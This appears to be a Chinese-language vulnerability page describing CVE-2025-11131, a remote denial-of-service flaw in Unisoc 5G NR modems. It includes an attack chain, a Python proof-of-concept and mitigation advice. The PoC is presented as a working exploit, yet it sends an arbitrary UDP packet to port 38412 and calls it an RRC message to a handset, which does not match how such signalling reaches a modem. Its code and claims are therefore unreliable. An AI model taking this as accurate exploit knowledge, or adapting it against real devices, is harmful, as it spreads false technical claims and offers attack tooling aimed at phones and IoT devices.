CVE-2025-11131 - NR调制解调器输入验证不当导致远程拒绝服务

漏洞信息

漏洞编号

CVE-2025-11131

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NR Modem (5G NR调制解调器)

漏洞概述

CVE-2025-11131是Unisoc（紫光展锐）5G NR调制解调器中的一个高危拒绝服务漏洞。该漏洞源于调制解调器固件在处理网络输入时缺乏适当的输入验证机制。攻击者可以通过发送特制的网络数据包来触发该漏洞，导致受影响设备系统崩溃。由于该漏洞可通过网络远程利用，且无需任何认证或用户交互，因此具有极高的实际威胁性。此漏洞影响所有使用Unisoc 5G NR调制解调器的移动设备和物联网设备，包括智能手机、平板电脑、嵌入式系统等。攻击成功的后果是目标设备完全失去通信能力，造成服务中断。

技术细节

该漏洞位于Unisoc NR调制解调器的网络协议栈处理模块中。具体来说，调制解调器在解析NR网络信令消息时，未对输入数据的长度、格式和内容进行充分的边界检查。当攻击者向目标设备发送精心构造的NR RRC（无线资源控制）消息或NAS（非接入层）消息时，恶意数据会绕过安全检查，导致内存处理异常，最终引发系统崩溃。由于调制解解调器通常运行在独立的处理器上（基带处理器），此漏洞可能会影响整个设备的通信功能，甚至导致应用处理器无法正常工作。攻击者只需能够与目标设备的5G连接建立连接，即可发送恶意数据包触发漏洞。

攻击链分析

STEP 1

步骤1

攻击者识别目标设备使用的Unisoc 5G NR调制解调器

STEP 2

步骤2

攻击者与目标设备建立5G NR网络连接

STEP 3

步骤3

攻击者构造包含恶意数据的NR RRC或NAS消息

STEP 4

步骤4

特制的消息被发送到目标调制解调器的网络接口

STEP 5

步骤5

调制解调器固件处理消息时由于输入验证不当导致内存错误

STEP 6

步骤6

系统崩溃，设备失去通信能力，触发拒绝服务状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# CVE-2025-11131 PoC - NR Modem DoS
# Target: Unisoc 5G NR Modem
# Attack Vector: Malformed NR Network Message

def create_malformed_nr_message():
    """
    Create a malformed NR RRC message to trigger input validation vulnerability
    """
    # NR RRC Connection Setup message with malformed parameters
    msg = bytearray()
    
    # Message Type: DL-CCCH-Message
    msg.extend([0x00, 0x01])
    
    # Message Content - Malformed DL-CCCH-Message
    msg.extend([0x00, 0x02])
    
    # CRITICAL: Malformed IE with invalid length
    msg.extend([0x00, 0x7F])  # Invalid IEI
    msg.extend([0xFF, 0xFF, 0xFF, 0xFF])  # Invalid length field
    
    # Additional malformed data
    msg.extend([0x00] * 128)
    
    return bytes(msg)

def send_exploit(target_ip, port=38412):
    """
    Send malformed NR message to target
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    
    payload = create_malformed_nr_message()
    
    try:
        print(f"[*] Sending malformed NR message to {target_ip}:{port}")
        sock.sendto(payload, (target_ip, port))
        print("[+] Payload sent successfully")
        print("[*] Target NR modem should crash")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_11131_poc.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    send_exploit(target)

影响范围

Unisoc NR Modem 固件（未修复版本）

防御指南

临时缓解措施

由于该漏洞位于调制解调器固件层面，临时缓解措施有限。建议：1）监控网络流量，识别异常的NR信令消息；2）在防火墙层面过滤来源不明的5G信令；3）如设备支持，切换到4G LTE模式作为临时替代方案；4）限制设备的5G网络暴露时间。但根本解决仍需等待厂商发布固件更新。